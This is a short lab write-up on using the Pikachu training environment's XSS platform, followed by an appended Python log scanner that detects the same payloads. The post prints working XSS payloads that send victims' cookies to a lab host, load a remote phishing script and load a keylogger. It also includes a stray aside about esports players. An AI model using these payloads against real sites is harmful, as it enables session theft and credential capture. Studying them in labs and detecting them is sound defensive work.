XSS: Setting Up an XSS Platform

Anonymous / 2023-08-11 / Original article

pikachu

GET-based XSS

1. The XSS platform's configuration file must be modified first

 

2. payload (192.168.221.135 is the IP address of the XSS platform): <script>document.location='http://192.168.221.135/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

I'll write one of these myself someday. Which LCK player do you like? Faker? Who is Faker, I don't care. Who is Chovy, I don't care. ShowMaker? Seize the only chance of this lifetime!

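POST-based XSS

1. After the link is clicked, the browser visits the site that is already logged in on the local machine

2. The site's cookie is sent to the XSS platform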

 

payload: 192.168.221.135/pikachu/pkxss/xcookie/post.html

Phishing

Edit the fish file and change the IP to your own

payload: <script src="http://192.168.221.135/pikachu/pkxss/xfish/fish.php"></script>

Because of a PHP version issue, the phishing does not succeed

Fix: cloud.tencent.com/developer/article/1853923

Keylogging

Modify the code

payload: <script src="http://192.168.221.135/pikachu/pkxss/rkeypress/rk.js"></script>
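
Added example, not part of the original post: a defender-side check that scans web access logs for the GET-delivered payload shapes shown above (cookie exfiltration through document.location, and remote <script src> includes such as fish.php and rk.js). The log lines, the /app/page.php path and the message parameter are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Rules derived from the payload shapes shown on this page.
RULES = {
    "cookie-exfil": re.compile(r"document\.cookie", re.I),
    "forced-redirect": re.compile(r"document\.location\s*=", re.I),
    "inline-script": re.compile(r"<script\b", re.I),
    "remote-script": re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # request field of a combined log line

def decode(value, rounds=3):
    """Strip extra URL-encoding layers; double encoding is a common filter bypass."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return sorted (parameter, rule) hits for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    hits = set()
    # parse_qsl removes the first encoding layer; decode() removes any others.
    for name, raw in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        text = decode(raw)
        hits.update((name, rule) for rule, rx in RULES.items() if rx.search(text))
    return sorted(hits)

def log_line(value):
    """Build a constructed log line; /app/page.php and 'message' are placeholders."""
    return f'10.0.0.7 - - [11/Aug/2023:10:00:00 +0000] "GET /app/page.php?message={value} HTTP/1.1" 200 512'

COOKIE = "<script>document.location='http://192.168.221.135/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>"
REMOTE = '<script src="http://192.168.221.135/pikachu/pkxss/rkeypress/rk.js"></script>'
SAMPLE_LOG = [  # constructed input, not real traffic
    log_line(quote(COOKIE, safe="")),
    log_line(quote(quote(REMOTE, safe=""), safe="")),  # double-encoded
    log_line("xss+lab+notes"),
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry) or "clean", "<-", entry[-60:])
```

Payloads delivered in a POST body or stored in the page do not appear in the request line, so this check covers the GET case only.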